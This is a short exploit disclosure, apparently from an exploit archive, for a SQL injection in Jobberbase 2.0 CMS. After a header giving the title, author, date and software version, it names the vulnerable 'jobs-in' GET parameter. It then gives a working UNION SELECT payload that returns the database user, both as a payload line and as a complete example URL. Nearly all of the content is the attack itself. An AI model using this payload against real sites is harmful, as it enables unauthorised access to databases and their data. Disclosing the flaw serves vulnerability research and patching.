19 lines
No EOL
612 B
Text
19 lines
No EOL
612 B
Text
# Exploit Title: Jobberbase 2.0 CMS - 'jobs-in' SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 28, August 2019
|
|
# Exploit Author: Suvadip Kar
|
|
# Vendor Homepage: http://jobberbase.com/
|
|
# Software Link: https://github.com/filipcte/jobberbase/zipball/master
|
|
# Version: 2.0
|
|
# Tested on: Linux
|
|
# CVE : N/A
|
|
|
|
--------------------------------------------------------------------------------
|
|
|
|
#POC - SQLi
|
|
#Request: http://localhost/[PATH]/jobs/jobs-in/
|
|
#Vulnerable Parameter: jobs-in (GET)
|
|
#Payload: -4115" UNION ALL SELECT 33,user()-- XYZ
|
|
|
|
#EXAMPLE: http://localhost/[PATH]/jobs/jobs-in/-4115" UNION ALL SELECT
|
|
33,user()-- XYZ |